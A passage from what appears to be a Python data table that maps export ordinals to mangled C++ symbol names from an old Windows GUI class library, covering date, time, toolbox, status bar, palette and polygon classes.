817: b'?RemoveValue@MetricBox@@QAEXJW4FieldUnit@@@Z',
818: b'?RemoveValue@NumericBox@@QAEXJ@Z',
819: b'?Resize@SpinField@@UAEXXZ',
820: b'?SetValue@CurrFmt@@QAEXJ@Z',
821: b'?SetValue@MetFmt@@QAEXJW4FieldUnit@@@Z',
822: b'?SetValue@NumFmt@@QAEXJ@Z',
823: b'?Timeout@SpinField@@QAEXPAVTimer@@@Z',
824: b'?Up@CurrencyField@@UAEXXZ',
825: b'?Up@MetricField@@UAEXXZ',
826: b'?Up@NumericField@@UAEXXZ',
827: b'?Up@SpinField@@UAEXXZ',
828: b'??0Date@@QAE@ABV0@@Z',
829: b'??0Date@@QAE@GGG@Z',
830: b'??0DateBox@@QAE@PAVWindow@@ABVResId@@@Z',
831: b'??0DateBox@@QAE@PAVWindow@@G@Z',
832: b'??0DateField@@QAE@PAVWindow@@ABVResId@@@Z',
833: b'??0DateField@@QAE@PAVWindow@@G@Z',
834: b'??0DateFmt@@QAE@ABVResId@@@Z',
835: b'??0DateFmt@@QAE@XZ',
836: b'??0PatFmt@@QAE@ABVResId@@@Z',
837: b'??0PatFmt@@QAE@XZ',
838: b'??0PatternBox@@QAE@PAVWindow@@ABVResId@@@Z',
839: b'??0PatternBox@@QAE@PAVWindow@@G@Z',
840: b'??0PatternField@@QAE@PAVWindow@@ABVResId@@@Z',
841: b'??0PatternField@@QAE@PAVWindow@@G@Z',
842: b'??0Selection@@QAE@ABV0@@Z',
843: b'??0Selection@@QAE@F@Z',
844: b'??0Time@@QAE@ABV0@@Z',
845: b'??0TimeBox@@QAE@PAVWindow@@ABVResId@@@Z',
846: b'??0TimeBox@@QAE@PAVWindow@@G@Z',
847: b'??0TimeField@@QAE@PAVWindow@@ABVResId@@@Z',
848: b'??0TimeField@@QAE@PAVWindow@@G@Z',
849: b'??0TimeFmt@@QAE@ABVResId@@@Z',
850: b'??0TimeFmt@@QAE@XZ',
851: b'??1DateBox@@UAE@XZ',
852: b'??1DateField@@UAE@XZ',
853: b'??1DateFmt@@QAE@XZ',
854: b'??1PatFmt@@QAE@XZ',
855: b'??1PatternBox@@UAE@XZ',
856: b'??1PatternField@@UAE@XZ',
857: b'??1TimeBox@@UAE@XZ',
858: b'??1TimeField@@UAE@XZ',
859: b'??1TimeFmt@@QAE@XZ',
860: b'??4Date@@QAEAAV0@ABV0@@Z',
861: b'??4Time@@QAEAAV0@ABV0@@Z',
862: b'??8@YGEABVDate@@0@Z',
863: b'??8@YGEABVTime@@0@Z',
864: b'??9@YGEABVDate@@0@Z',
865: b'??9@YGEABVTime@@0@Z',
866: b'??BString@@QBEDXZ',
867: b'??GTime@@QBE?AV0@XZ',
868: b'??M@YGEABVDate@@0@Z',
869: b'??M@YGEABVTime@@0@Z',
870: b'??O@YGEABVDate@@0@Z',
871: b'??O@YGEABVTime@@0@Z',
872: b'??_7DateBox@@6BComboBox@@@',
873: b'??_7DateBox@@6BDateFmt@@@',
874: b'??_7DateField@@6BDateFmt@@@',
875: b'??_7DateField@@6BSpinField@@@',
876: b'??_7DateFmt@@6B@',
877: b'??_7PatFmt@@6B@',
878: b'??_7PatternBox@@6BComboBox@@@',
879: b'??_7PatternBox@@6BPatFmt@@@',
880: b'??_7PatternField@@6BPatFmt@@@',
881: b'??_7PatternField@@6BSpinField@@@',
882: b'??_7TimeBox@@6BComboBox@@@',
883: b'??_7TimeBox@@6BTimeFmt@@@',
884: b'??_7TimeField@@6BSpinField@@@',
885: b'??_7TimeField@@6BTimeFmt@@@',
886: b'??_7TimeFmt@@6B@',
887: b'??_GDateBox@@UAEPAXI@Z',
888: b'??_GDateField@@UAEPAXI@Z',
889: b'??_GPatternBox@@UAEPAXI@Z',
890: b'??_GPatternField@@UAEPAXI@Z',
891: b'??_GTimeBox@@UAEPAXI@Z',
892: b'??_GTimeField@@UAEPAXI@Z',
893: b'?ChangeDuration@TimeFmt@@QAEEE@Z',
894: b'?ChangeFormat@TimeFmt@@QAE?AW4TimeFieldFormat@@W42@@Z',
895: b'?ChangeInternational@DateFmt@@QAE?AVInternational@@ABV2@@Z',
896: b'?ChangeInternational@TimeFmt@@QAE?AVInternational@@ABV2@@Z',
897: b'?ChangeLongFormat@DateFmt@@QAEEE@Z',
898: b'?ChangeMax@DateFmt@@QAE?AVDate@@ABV2@@Z',
899: b'?ChangeMax@TimeFmt@@QAE?AVTime@@ABV2@@Z',
900: b'?ChangeMin@DateFmt@@QAE?AVDate@@ABV2@@Z',
901: b'?ChangeMin@TimeFmt@@QAE?AVTime@@ABV2@@Z',
902: b'?ChangeStrictFormat@DateFmt@@QAEEE@Z',
903: b'?ChangeStrictFormat@PatFmt@@QAEEE@Z',
904: b'?ChangeStrictFormat@TimeFmt@@QAEEE@Z',
905: b'?Down@DateField@@UAEXXZ',
906: b'?Down@TimeField@@UAEXXZ',
907: b'?First@DateField@@UAEXXZ',
908: b'?First@TimeField@@UAEXXZ',
909: b'?GetDate@DateBox@@QBE?AVDate@@G@Z',
910: b'?GetDate@DateFmt@@QBE?AVDate@@XZ',
911: b'?GetDateFormat@CountryTable@@QBE?AW4DateFormat@@XZ',
912: b'?GetDateFormat@International@@QBE?AW4DateFormat@@XZ',
913: b'?GetDatePos@DateBox@@QBEGABVDate@@@Z',
914: b'?GetDateSep@CountryTable@@QBEDXZ',
915: b'?GetDateSep@International@@QBEDXZ',
916: b'?GetDay@Date@@QBEGXZ',
917: b'?GetFocus@DateBox@@UAEXXZ',
918: b'?GetFocus@DateField@@UAEXXZ',
919: b'?GetFocus@PatternBox@@UAEXXZ',
920: b'?GetFocus@PatternField@@UAEXXZ',
921: b'?GetFocus@TimeBox@@UAEXXZ',
922: b'?GetFocus@TimeField@@UAEXXZ',
923: b'?GetLongDateFormat@CountryTable@@QBE?AW4DateFormat@@XZ',
924: b'?GetLongDateFormat@International@@QBE?AW4DateFormat@@XZ',
925: b'?GetMonth@Date@@QBEGXZ',
926: b'?GetMonthText@International@@QBEABVString@@G@Z',
927: b'?GetMonthText@LanguageTable@@QBEABVString@@G@Z',
928: b'?GetString@PatFmt@@QBE?AVString@@XZ',
929: b'?GetString@PatternBox@@QBE?AVString@@G@Z',
930: b'?GetStringPos@PatternBox@@QBEGABVString@@@Z',
931: b'?GetTime100SecSep@CountryTable@@QBEDXZ',
932: b'?GetTime100SecSep@International@@QBEDXZ',
933: b'?GetTime@TimeBox@@QBE?AVTime@@G@Z',
934: b'?GetTime@TimeFmt@@QBE?AVTime@@XZ',
935: b'?GetTimeAM@CountryTable@@QBEABVString@@XZ',
936: b'?GetTimeAM@International@@QBEABVString@@XZ',
937: b'?GetTimePM@CountryTable@@QBEABVString@@XZ',
938: b'?GetTimePM@International@@QBEABVString@@XZ',
939: b'?GetTimePos@TimeBox@@QBEGABVTime@@@Z',
940: b'?GetTimeSep@CountryTable@@QBEDXZ',
941: b'?GetTimeSep@International@@QBEDXZ',
942: b'?GetYear@Date@@QBEGXZ',
943: b'?InsertDate@DateBox@@QAEXABVDate@@G@Z',
944: b'?InsertString@PatternBox@@QAEXABVString@@G@Z',
945: b'?InsertTime@TimeBox@@QAEXABVTime@@G@Z',
946: b'?IsDateCentury@CountryTable@@QBEEXZ',
947: b'?IsDateCentury@International@@QBEEXZ',
948: b'?IsDateModified@DateFmt@@QBEEXZ',
949: b'?IsLongDateCentury@CountryTable@@QBEEXZ',
950: b'?IsLongDateCentury@International@@QBEEXZ',
951: b'?IsMod2@KeyCode@@QBEEXZ',
952: b'?IsStringModified@PatFmt@@QBEEXZ',
953: b'?IsTimeModified@TimeFmt@@QBEEXZ',
954: b'?KeyInput@DateBox@@UAEXABVKeyEvent@@@Z',
955: b'?KeyInput@DateField@@UAEXABVKeyEvent@@@Z',
956: b'?KeyInput@PatternBox@@UAEXABVKeyEvent@@@Z',
957: b'?KeyInput@PatternField@@UAEXABVKeyEvent@@@Z',
958: b'?KeyInput@TimeBox@@UAEXABVKeyEvent@@@Z',
959: b'?KeyInput@TimeField@@UAEXABVKeyEvent@@@Z',
960: b'?Last@DateField@@UAEXXZ',
961: b'?Last@TimeField@@UAEXXZ',
962: b'?LoseFocus@DateBox@@UAEXXZ',
963: b'?LoseFocus@DateField@@UAEXXZ',
964: b'?LoseFocus@PatternBox@@UAEXXZ',
965: b'?LoseFocus@PatternField@@UAEXXZ',
966: b'?LoseFocus@TimeBox@@UAEXXZ',
967: b'?LoseFocus@TimeField@@UAEXXZ',
968: b'?Min@Selection@@QAEAAFXZ',
969: b'?Min@Selection@@QBEFXZ',
970: b'?Modify@DateBox@@UAEXXZ',
971: b'?Modify@DateField@@UAEXXZ',
972: b'?Modify@PatternBox@@UAEXXZ',
973: b'?Modify@PatternField@@UAEXXZ',
974: b'?Modify@TimeBox@@UAEXXZ',
975: b'?Modify@TimeField@@UAEXXZ',
976: b'?Reformat@DateFmt@@UAEXXZ',
977: b'?Reformat@PatFmt@@UAEXXZ',
978: b'?Reformat@TimeFmt@@UAEXXZ',
979: b'?ReformatAll@DateBox@@UAEXXZ',
980: b'?ReformatAll@DateFmt@@UAEXXZ',
981: b'?ReformatAll@PatFmt@@UAEXXZ',
982: b'?ReformatAll@PatternBox@@UAEXXZ',
983: b'?ReformatAll@TimeBox@@UAEXXZ',
984: b'?ReformatAll@TimeFmt@@UAEXXZ',
985: b'?RemoveDate@DateBox@@QAEXABVDate@@@Z',
986: b'?RemoveString@PatternBox@@QAEXABVString@@@Z',
987: b'?RemoveTime@TimeBox@@QAEXABVTime@@@Z',
988: b'?SetDate@DateFmt@@QAEXABVDate@@@Z',
989: b'?SetMask@PatFmt@@QAEXABVString@@0@Z',
990: b'?SetString@PatFmt@@QAEXABVString@@@Z',
991: b'?SetTime@TimeFmt@@QAEXABVTime@@@Z',
992: b'?Up@DateField@@UAEXXZ',
993: b'?Up@TimeField@@UAEXXZ',
994: b'??0List@@QAE@GGG@Z',
995: b'??0MoreButton@@QAE@PAVWindow@@ABVResId@@@Z',
996: b'??0MoreButton@@QAE@PAVWindow@@G@Z',
997: b'??0MoreWindowList@@QAE@GGG@Z',
998: b'??1MoreButton@@UAE@XZ',
999: b'??1MoreWindowList@@QAE@XZ',
1000: b'??1PushButton@@UAE@XZ',
1001: b'??_7MoreButton@@6B@',
1002: b'??_GMoreButton@@UAEPAXI@Z',
1003: b'??_GMoreWindowList@@QAEPAXI@Z',
1004: b'?AddWindow@MoreButton@@QAEXPAVWindow@@@Z',
1005: b'?ChangeDelta@MoreButton@@QAEGG@Z',
1006: b'?ChangeMapUnit@MoreButton@@QAE?AW4MapUnit@@W42@@Z',
1007: b'?ChangeState@MoreButton@@QAEEE@Z',
1008: b'?Click@MoreButton@@UAEXXZ',
1009: b'?First@MoreWindowList@@QAEPAVWindow@@XZ',
1010: b'?GetText@MoreButton@@QBE?AVString@@XZ',
1011: b'?InitMoreButton@@YGXPAVMoreButton@@@Z',
1012: b'?Insert@MoreWindowList@@QAEXPAVWindow@@K@Z',
1013: b'?Next@MoreWindowList@@QAEPAVWindow@@XZ',
1014: b'?Remove@MoreWindowList@@QAEPAVWindow@@PAV2@@Z',
1015: b'?RemoveWindow@MoreButton@@QAEXPAVWindow@@@Z',
1016: b'?SetText@MoreButton@@QAEXABVString@@@Z',
1017: b'??0ApplicationEvent@@QAE@ABVString@@000@Z',
1018: b'??0DropEvent@@QAE@ABVPoint@@W4DropAction@@E@Z',
1019: b'??0DropEvent@@QAE@XZ',
1020: b'??0PolyPolygon@@QAE@ABV0@@Z',
1021: b'??0PolyPolygon@@QAE@ABVPolygon@@@Z',
1022: b'??0PolyPolygon@@QAE@GG@Z',
1023: b'??0PolyPolygon@@QAE@GQAGQAVPoint@@@Z',
1024: b'??0Polygon@@QAE@ABV0@@Z',
1025: b'??0Polygon@@QAE@ABVRectangle@@@Z',
1026: b'??0Polygon@@QAE@G@Z',
1027: b'??0Polygon@@QAE@GQAVPoint@@@Z',
1028: b'??1PolyPolygon@@QAE@XZ',
1029: b'??1Polygon@@QAE@XZ',
1030: b'??4PolyPolygon@@QAEAAV0@ABV0@@Z',
1031: b'??4Polygon@@QAEAAV0@ABV0@@Z',
1032: b'??8PolyPolygon@@QBEEABV0@@Z',
1033: b'??8Polygon@@QBEEABV0@@Z',
1034: b'??9PolyPolygon@@QBEEABV0@@Z',
1035: b'??9Polygon@@QBEEABV0@@Z',
1036: b'??APolygon@@QAEAAVPoint@@G@Z',
1037: b'??APolygon@@QBE?AVPoint@@G@Z',
1038: b'??_GPolygon@@QAEPAXI@Z',
1039: b'?ChangePoint@Polygon@@QAE?AVPoint@@ABV2@G@Z',
1040: b'?ChangeSize@Polygon@@QAEGG@Z',
1041: b'?Clear@PolyPolygon@@QAEXXZ',
1042: b'?Clear@Polygon@@QAEXXZ',
1043: b'?Count@PolyPolygon@@QBEGXZ',
1044: b'?GetObject@PolyPolygon@@QBE?AVPolygon@@G@Z',
1045: b'?GetPoint@Polygon@@QBE?AVPoint@@G@Z',
1046: b'?GetSize@Container@@QBEKXZ',
1047: b'?GetSize@Polygon@@QBEGXZ',
1048: b'?Insert@PolyPolygon@@QAEXABVPolygon@@G@Z',
1049: b'?IsEmpty@Rectangle@@QBEEXZ',
1050: b'?Remove@PolyPolygon@@QAE?AVPolygon@@G@Z',
1051: b'?Replace@PolyPolygon@@QAE?AVPolygon@@ABV2@G@Z',
1052: b'??0Region@@QAE@ABV0@@Z',
1053: b'??0Region@@QAE@ABVPolyPolygon@@@Z',
1054: b'??0Region@@QAE@ABVPolygon@@@Z',
1055: b'??0Region@@QAE@ABVRectangle@@@Z',
1056: b'??0Region@@QAE@XZ',
1057: b'??1Region@@QAE@XZ',
1058: b'??4Region@@QAEAAV0@ABV0@@Z',
1059: b'??8Rectangle@@QBEEABV0@@Z',
1060: b'??8Region@@QBEEABV0@@Z',
1061: b'??9Region@@QBEEABV0@@Z',
1062: b'??_GPolyPolygon@@QAEPAXI@Z',
1063: b'?GetBoundRect@Region@@QBE?AVRectangle@@XZ',
1064: b'?GetType@Region@@QBE?AW4RegionType@@XZ',
1065: b'?Intersect@Region@@QAEXABVRectangle@@@Z',
1066: b'?IsEmpty@Region@@QBEEXZ',
1067: b'?Move@Region@@QAEXFF@Z',
1068: b'?DebugPrintMsgBox@@YGXPBD@Z',
1069: b'?DebugPrintShell@@YGXPBD@Z',
1070: b'?DebugPrintWindow@@YGXPBD@Z',
1071: b'??0BigInt@@QAE@F@Z',
1072: b'??0LPair@@QAE@ABV0@@Z',
1073: b'??0LPair@@QAE@JJ@Z',
1074: b'??0LPair@@QAE@XZ',
1075: b'??0LPoint@@QAE@ABV0@@Z',
1076: b'??0LPoint@@QAE@JJ@Z',
1077: b'??0LPoint@@QAE@XZ',
1078: b'?Abs@@YGFF@Z',
1079: b'?Abs@@YGJJ@Z',
1080: b'?ChangeMapMode@OutputDevice@@QAE?AVMapMode@@ABV2@@Z',
1081: b'?GetMapUnit@MapMode@@QBE?AW4MapUnit@@XZ',
1082: b'?IsNeg@BigInt@@QBEEXZ',
1083: b'?LogicToPixel@OutputDevice@@QBE?AVPoint@@ABV2@@Z',
1084: b'?LogicToPixel@OutputDevice@@QBE?AVPoint@@ABV2@ABVMapMode@@@Z',
1085: b'?LogicToPixel@OutputDevice@@QBE?AVPolyPolygon@@ABV2@@Z',
1086: b'?LogicToPixel@OutputDevice@@QBE?AVPolyPolygon@@ABV2@ABVMapMode@@@Z',
1087: b'?LogicToPixel@OutputDevice@@QBE?AVPolygon@@ABV2@@Z',
1088: b'?LogicToPixel@OutputDevice@@QBE?AVPolygon@@ABV2@ABVMapMode@@@Z',
1089: b'?LogicToPixel@OutputDevice@@QBE?AVRectangle@@ABV2@@Z',
1090: b'?LogicToPixel@OutputDevice@@QBE?AVRectangle@@ABV2@ABVMapMode@@@Z',
1091: b'?LogicToPixel@OutputDevice@@QBE?AVRegion@@ABV2@@Z',
1092: b'?LogicToPixel@OutputDevice@@QBE?AVRegion@@ABV2@ABVMapMode@@@Z',
1093: b'?LogicToPixel@OutputDevice@@QBE?AVSize@@ABV2@@Z',
1094: b'?LogicToPixel@OutputDevice@@QBE?AVSize@@ABV2@ABVMapMode@@@Z',
1095: b'?LongLogicToPixel@@YG?AVLPoint@@PAVOutputDevice@@ABV1@@Z',
1096: b'?LongPixelToLogic@@YG?AVLPoint@@PAVOutputDevice@@ABV1@@Z',
1097: b'?PixelToLogic@OutputDevice@@QBE?AVPoint@@ABV2@@Z',
1098: b'?PixelToLogic@OutputDevice@@QBE?AVPoint@@ABV2@ABVMapMode@@@Z',
1099: b'?PixelToLogic@OutputDevice@@QBE?AVPolyPolygon@@ABV2@@Z',
1100: b'?PixelToLogic@OutputDevice@@QBE?AVPolyPolygon@@ABV2@ABVMapMode@@@Z',
1101: b'?PixelToLogic@OutputDevice@@QBE?AVPolygon@@ABV2@@Z',
1102: b'?PixelToLogic@OutputDevice@@QBE?AVPolygon@@ABV2@ABVMapMode@@@Z',
1103: b'?PixelToLogic@OutputDevice@@QBE?AVRectangle@@ABV2@@Z',
1104: b'?PixelToLogic@OutputDevice@@QBE?AVRectangle@@ABV2@ABVMapMode@@@Z',
1105: b'?PixelToLogic@OutputDevice@@QBE?AVRegion@@ABV2@@Z',
1106: b'?PixelToLogic@OutputDevice@@QBE?AVRegion@@ABV2@ABVMapMode@@@Z',
1107: b'?PixelToLogic@OutputDevice@@QBE?AVSize@@ABV2@@Z',
1108: b'?PixelToLogic@OutputDevice@@QBE?AVSize@@ABV2@ABVMapMode@@@Z',
1109: b'?X@LPoint@@QAEAAJXZ',
1110: b'?X@LPoint@@QBEJXZ',
1111: b'?Y@LPoint@@QAEAAJXZ',
1112: b'?Y@LPoint@@QBEJXZ',
1113: b'??0Color@@QAE@GGG@Z',
1114: b'??0ToolBox@@QAE@PAVWindow@@ABVResId@@@Z',
1115: b'??0ToolBox@@QAE@PAVWindow@@G@Z',
1116: b'??0ToolFormatList@@QAE@XZ',
1117: b'??0ToolItem@@QAE@ABU0@@Z',
1118: b'??0ToolItem@@QAE@XZ',
1119: b'??0ToolItemList@@QAE@GG@Z',
1120: b'??1ToolBox@@UAE@XZ',
1121: b'??1ToolFormatList@@QAE@XZ',
1122: b'??1ToolItem@@QAE@XZ',
1123: b'??1ToolItemList@@QAE@XZ',
1124: b'??_7ToolBox@@6B@',
1125: b'??_GToolBox@@UAEPAXI@Z',
1126: b'??_GToolFormatList@@QAEPAXI@Z',
1127: b'??_GToolItem@@QAEPAXI@Z',
1128: b'??_GToolItemList@@QAEPAXI@Z',
1129: b'?Activate@ToolBox@@UAEXXZ',
1130: b'?Add@ToolFormatList@@QAEXG@Z',
1131: b'?CalcWindowSizePixel@ToolBox@@QBE?AVSize@@XZ',
1132: b'?ChangeAlign@ToolBox@@QAE?AW4ToolBoxAlign@@W42@@Z',
1133: b'?ChangeButtonType@ToolBox@@QAE?AW4ButtonType@@W42@@Z',
1134: b'?ChangeHelpId@ToolBox@@QAEKGK@Z',
1135: b'?ChangeLineCount@ToolBox@@QAEGG@Z',
1136: b'?CheckItem@ToolBox@@QAEXGE@Z',
1137: b'?Clear@ToolBox@@QAEXXZ',
1138: b'?Clear@ToolItemList@@QAEXXZ',
1139: b'?Click@ToolBox@@UAEXXZ',
1140: b'?CopyItems@ToolBox@@QAEXABV1@@Z',
1141: b'?Count@ToolItemList@@QBEKXZ',
1142: b'?Deactivate@ToolBox@@UAEXXZ',
1143: b'?Disable@ToolBox@@QAEXXZ',
1144: b'?DoubleClick@ToolBox@@UAEXXZ',
1145: b'?Enable@ToolBox@@QAEXXZ',
1146: b'?EnableItem@ToolBox@@QAEXGE@Z',
1147: b'?EndSelection@ToolBox@@QAEXXZ',
1148: b'?First@ToolItemList@@QAEPAUToolItem@@XZ',
1149: b'?Get@ToolFormatList@@QBEGG@Z',
1150: b'?GetClicks@MouseEvent@@QBEGXZ',
1151: b'?GetCurPos@ToolItemList@@QBEKXZ',
1152: b'?GetHelpId@ToolBox@@QBEKG@Z',
1153: b'?GetHelpText@ToolBox@@QBE?AVString@@G@Z',
1154: b'?GetItemBitmap@ToolBox@@QBE?AVBitmap@@G@Z',
1155: b'?GetItemCount@ToolBox@@QBEGXZ',
1156: b'?GetItemDisableBitmap@ToolBox@@QBE?AVBitmap@@G@Z',
1157: b'?GetItemId@ToolBox@@QBEGABVPoint@@@Z',
1158: b'?GetItemId@ToolBox@@QBEGG@Z',
1159: b'?GetItemPos@ToolBox@@QBEGG@Z',
1160: b'?GetItemRect@ToolBox@@QBE?AVRectangle@@G@Z',
1161: b'?GetItemText@ToolBox@@QBE?AVString@@G@Z',
1162: b'?GetItemType@ToolBox@@QBE?AW4ToolBoxItemType@@G@Z',
1163: b'?GetMode@HelpEvent@@QBE?AW4HelpMode@@XZ',
1164: b'?GetMousePosPixel@HelpEvent@@QBEABVPoint@@XZ',
1165: b'?GetObject@ToolItemList@@QBEPAUToolItem@@K@Z',
1166: b'?Highlight@ToolBox@@UAEXXZ',
1167: b'?Insert@ToolItemList@@QAEXPAUToolItem@@K@Z',
1168: b'?InsertBreak@ToolBox@@QAEXG@Z',
1169: b'?InsertItem@ToolBox@@QAEEABVResId@@G@Z',
1170: b'?InsertItem@ToolBox@@QAEEGABVBitmap@@0ABVString@@G@Z',
1171: b'?InsertItem@ToolBox@@QAEEGABVBitmap@@0G@Z',
1172: b'?InsertItem@ToolBox@@QAEEGABVBitmap@@ABVString@@G@Z',
1173: b'?InsertItem@ToolBox@@QAEEGABVBitmap@@G@Z',
1174: b'?InsertItem@ToolBox@@QAEEGABVString@@G@Z',
1175: b'?InsertSeparator@ToolBox@@QAEXG@Z',
1176: b'?InsertSpace@ToolBox@@QAEXG@Z',
1177: b'?IsItemChecked@ToolBox@@QBEEG@Z',
1178: b'?IsItemEnabled@ToolBox@@QBEEG@Z',
1179: b'?MouseButtonDown@ToolBox@@UAEXABVMouseEvent@@@Z',
1180: b'?MouseButtonUp@ToolBox@@UAEXABVMouseEvent@@@Z',
1181: b'?MouseMove@ToolBox@@UAEXABVMouseEvent@@@Z',
1182: b'?Next@ToolItemList@@QAEPAUToolItem@@XZ',
1183: b'?Paint@ToolBox@@UAEXABVRectangle@@@Z',
1184: b'?Remove@ToolItemList@@QAEPAUToolItem@@K@Z',
1185: b'?RemoveItem@ToolBox@@QAEXG@Z',
1186: b'?RequestHelp@ToolBox@@UAEXABVHelpEvent@@@Z',
1187: b'?Resize@ToolBox@@UAEXXZ',
1188: b'?Select@ToolBox@@UAEXXZ',
1189: b'?SetHelpText@ToolBox@@QAEXGABVString@@@Z',
1190: b'?SetItemBitmap@ToolBox@@QAEXGABVBitmap@@@Z',
1191: b'?SetItemDisableBitmap@ToolBox@@QAEXGABVBitmap@@@Z',
1192: b'?SetItemText@ToolBox@@QAEXGABVString@@@Z',
1193: b'?Show@ToolBox@@QAEXXZ',
1194: b'??0StatusBar@@QAE@PAVWindow@@ABVResId@@@Z',
1195: b'??0StatusBar@@QAE@PAVWindow@@G@Z',
1196: b'??0StatusItem@@QAE@ABU0@@Z',
1197: b'??0StatusItem@@QAE@XZ',
1198: b'??0StatusItemList@@QAE@GG@Z',
1199: b'??1StatusBar@@UAE@XZ',
1200: b'??1StatusItem@@QAE@XZ',
1201: b'??1StatusItemList@@QAE@XZ',
1202: b'??BString@@QBGPBDXZ',
1203: b'??_7StatusBar@@6B@',
1204: b'??_GStatusBar@@UAEPAXI@Z',
1205: b'??_GStatusItem@@QAEPAXI@Z',
1206: b'??_GStatusItemList@@QAEPAXI@Z',
1207: b'?ChangeAlign@StatusBar@@QAE?AW4StatusBarAlign@@W42@@Z',
1208: b'?Clear@StatusBar@@QAEXXZ',
1209: b'?Clear@StatusItemList@@QAEXXZ',
1210: b'?Click@StatusBar@@UAEXXZ',
1211: b'?CopyItems@StatusBar@@QAEXABV1@@Z',
1212: b'?Count@StatusItemList@@QBEKXZ',
1213: b'?DoubleClick@StatusBar@@UAEXXZ',
1214: b'?First@StatusItemList@@QAEPAUStatusItem@@XZ',
1215: b'?GetCurPos@StatusItemList@@QBEKXZ',
1216: b'?GetItemCount@StatusBar@@QBEGXZ',
1217: b'?GetItemId@StatusBar@@QBEGG@Z',
1218: b'?GetItemPos@StatusBar@@QBEGG@Z',
1219: b'?GetItemRect@StatusBar@@QBE?AVRectangle@@G@Z',
1220: b'?GetItemText@StatusBar@@QBE?AVString@@G@Z',
1221: b'?GetObject@StatusItemList@@QBEPAUStatusItem@@K@Z',
1222: b'?HideItems@StatusBar@@QAEXXZ',
1223: b'?Insert@StatusItemList@@QAEXPAUStatusItem@@K@Z',
1224: b'?InsertItem@StatusBar@@QAEEGGW4StatusItemAlign@@GG@Z',
1225: b'?MouseButtonDown@StatusBar@@UAEXABVMouseEvent@@@Z',
1226: b'?Next@StatusItemList@@QAEPAUStatusItem@@XZ',
1227: b'?Paint@StatusBar@@UAEXABVRectangle@@@Z',
1228: b'?Remove@StatusItemList@@QAEPAUStatusItem@@K@Z',
1229: b'?RemoveItem@StatusBar@@QAEXG@Z',
1230: b'?Resize@StatusBar@@UAEXXZ',
1231: b'?SetItemText@StatusBar@@QAEXGABVString@@@Z',
1232: b'?SetText@StatusBar@@QAEXABVString@@@Z',
1233: b'?ShowItems@StatusBar@@QAEXXZ',
1234: b'??0Palette@@QAE@ABV0@@Z',
1235: b'??0Palette@@QAE@G@Z',
1236: b'??0Palette@@QAE@GQAVColor@@E@Z',
1237: b'??1PalColor@@QAE@XZ',
1238: b'??1Palette@@QAE@XZ',
1239: b'??4Palette@@QAEAAV0@ABV0@@Z',
1240: b'??8Palette@@QBEEABV0@@Z',
1241: b'??9Palette@@QBEEABV0@@Z',
1242: b'??APalette@@QAEAAVColor@@G@Z',
1243: b'??APalette@@QBE?AVColor@@G@Z',
1244: b'??_GPalColor@@QAEPAXI@Z',
1245: b'?ChangeAnimate@Palette@@QAEEGE@Z',
1246: b'?ChangeColor@Palette@@QAE?AVColor@@GABV2@@Z',
1247: b'?ChangeEntryCount@Palette@@QAEGG@Z',
1248: b'?GetColor@Palette@@QBE?AVColor@@G@Z',
1249: b'?GetEntryCount@Palette@@QBEGXZ',
1250: b'?IsAnimate@Palette@@QBEEG@Z',
1251: b'?SetAnimate@Palette@@QAEXE@Z',
1252: b'?SetSVData@@YGXPAUSVDATA@@@Z',
1253: b'??0OutDevList@@QAE@GG@Z',
1254: b'??0UniqueId@@QAE@G@Z',
1255: b'??1FloatWinList@@QAE@XZ',
1256: b'??1OutDevList@@QAE@XZ',
1257: b'??1PalWindowList@@QAE@XZ',
1258: b'??1PopupList@@QAE@XZ',
1259: b'??1PrnTable@@QAE@XZ',
1260: b'??1UniqueId@@QAE@XZ',
1261: b'??1UniqueIndex@@QAE@XZ',
1262: b'??_GFloatWinList@@QAEPAXI@Z',
1263: b'??_GFont@@QAEPAXI@Z',
1264: b'??_GInternational@@QAEPAXI@Z',
1265: b'??_GOutDevList@@QAEPAXI@Z',
1266: b'??_GPalWindowList@@QAEPAXI@Z',
1267: b'??_GPopupList@@QAEPAXI@Z',
1268: b'??_GPrnTable@@QAEPAXI@Z',
1269: b'??_GResMgr@@QAEPAXI@Z',
1270: b'??_GStarObjectMgr@@QAEPAXI@Z',
1271: b'??_GString@@QAEPAXI@Z',
1272: b'??_GUniqueId@@QAEPAXI@Z',
1273: b'?DeInitSV@@YGXXZ',
1274: b'?InitSV@@YGEXZ',
1275: b'?GetWindowPtr@@YGPAVWindow@@PAUHWND__@@@Z',
1276: b'?GetWindowStyle@@YGKPAUHWND__@@@Z',
1277: b'?HideDropDown@@YGXXZ',
1278: b'?NextDialogControl@@YGXPAUHWND__@@0H@Z',
1279: b'?SetWindowPtr@@YGXPAUHWND__@@PAVWindow@@@Z',
1280: b'?TimerProc@@YGXPAUHWND__@@IIK@Z',
1281: b'?WndProc@@YGJPAUHWND__@@IIJ@Z',
1282: b'?GetActiveMDIWindow@@YGPAUHWND__@@PAU1@@Z',
1283: b'?MDIChildWndProc@@YGJPAUHWND__@@IIJ@Z',
1284: b'?MDIFrameWndProc@@YGJPAUHWND__@@IIJ@Z',
1285: b'?ComboBoxEdit@@YGJPAUHWND__@@IIJ@Z',
1286: b'?ControlProc@@YGJPAUHWND__@@IIJ@Z',
1287: b'?DlgProc@@YGHPAUHWND__@@IIJ@Z',
1288: b'?GetIdObject@UniqueId@@QBEPAVWindow@@G@Z',
1289: b'?GetWindowId@@YGIPAUHWND__@@@Z',
1290: b'?SelectFont@@YGPAUHFONT__@@PAUHDC__@@PAU1@@Z',
1291: b'?SetWindowStyle@@YGXPAUHWND__@@K@Z',
1292: b'?DeleteBrush@@YGXPAUHBRUSH__@@@Z',
1293: b'?DeleteFont@@YGXPAUHFONT__@@@Z',
1294: b'?DeletePen@@YGXPAUHPEN__@@@Z',
1295: b'?First@FloatWinList@@QAEPAVFloatingWindow@@XZ',
1296: b'?FloatWindowProc@@YGEPAVFloatingWindow@@PAUHWND__@@IIJAAJ@Z',
1297: b'?Next@FloatWinList@@QAEPAVFloatingWindow@@XZ',
1298: b'?SelectBrush@@YGPAUHBRUSH__@@PAUHDC__@@PAU1@@Z',
1299: b'?SelectPen@@YGPAUHPEN__@@PAUHDC__@@PAU1@@Z',
1300: b'??0HelpEvent@@QAE@ABVPoint@@W4HelpMode@@@Z',
1301: b'??0KeyCode@@QAE@GEEE@Z',
1302: b'??0KeyEvent@@QAE@DABVKeyCode@@G@Z',
1303: b'??0MouseEvent@@QAE@XZ',
1304: b'?ColorToWin@@YGKABVColor@@@Z',
1305: b'?DeleteBitmap@@YGXPAUHBITMAP__@@@Z',
1306: b'?First@PalWindowList@@QAEPAVWindow@@XZ',
